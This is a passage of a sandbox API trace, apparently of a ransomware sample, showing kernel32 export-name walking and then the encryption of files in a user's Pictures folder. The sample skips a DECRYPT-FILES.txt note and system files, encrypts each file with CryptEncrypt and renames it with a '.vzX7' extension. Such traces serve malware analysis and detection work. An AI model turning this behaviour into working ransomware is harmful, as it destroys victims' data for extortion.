[0086.854] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.854] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.854] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.854] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.854] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.854] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.854] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.854] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.854] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.854] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.855] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.855] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.855] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.855] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.855] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.855] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.855] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.855] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.855] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.855] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.855] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.855] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.855] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.855] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.855] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.855] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.855] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.855] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.855] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.856] lstrlenA (lpString="DELETEATOM") returned 10 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.856] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.856] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.856] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.856] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.856] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.856] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.856] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.856] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.856] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.856] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.856] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.856] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.856] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.856] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.856] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.856] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.856] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.856] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.857] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.857] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.857] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.857] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.857] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.857] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.857] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.857] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.857] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.857] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.857] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.860] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.860] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.860] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.860] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.860] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.860] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.864] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.909] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.909] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.909] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.909] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.909] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.909] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.909] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.910] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.910] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.910] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg") returned 64 [0086.913] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg.vzX7") returned 69 [0086.913] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ro76uyb3z.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg.vzX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ro76uyb3z.jpg.vzx7"), dwFlags=0x0) returned 1 [0086.917] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.918] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.918] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.918] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ab4f20, ftCreationTime.dwHighDateTime=0x1d4d52c, ftLastAccessTime.dwLowDateTime=0xdfcb7900, ftLastAccessTime.dwHighDateTime=0x1d4cd87, ftLastWriteTime.dwLowDateTime=0xdfcb7900, ftLastWriteTime.dwHighDateTime=0x1d4cd87, nFileSizeHigh=0x0, nFileSizeLow=0x74a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="UmDNBjx9-CEgQ.bmp", cAlternateFileName="UMDNBJ~1.BMP")) returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="autorun.inf") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="boot.ini") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="desktop.ini") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="ntuser.dat") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="iconcache.db") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="bootsect.bak") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="ntuser.dat.log") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="thumbs.db") returned 1 [0086.922] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp", lpString2="Bootfont.bin") returned 1 [0086.922] lstrlenW (lpString="UmDNBjx9-CEgQ.bmp") returned 17 [0086.922] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.922] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.922] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.922] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.922] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.922] lstrlenW (lpString="UmDNBjx9-CEgQ.bmp") returned 17 [0086.922] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.922] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="UmDNBjx9-CEgQ.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp" [0086.922] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\umdnbjx9-cegq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.926] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=29858) returned 1 [0086.926] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.926] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.929] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.929] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.932] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.932] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.957] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.957] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.958] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.958] CloseHandle (hObject=0x42c) returned 1 [0086.958] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.958] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.959] CloseHandle (hObject=0x0) returned 0 [0086.959] CloseHandle (hObject=0x428) returned 1 [0086.959] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.960] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.960] GetTickCount () returned 0x114e300 [0086.960] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.960] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.960] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.960] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.961] lstrlenA (lpString="kernel32.dll") returned 12 [0086.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.961] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.961] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.961] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.961] lstrlenA (lpString="ADDATOMA") returned 8 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.961] lstrlenA (lpString="ADDATOMW") returned 8 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.961] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.961] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.961] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.961] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.961] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.962] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.962] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.962] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.962] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.962] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.962] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.962] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.962] lstrlenA 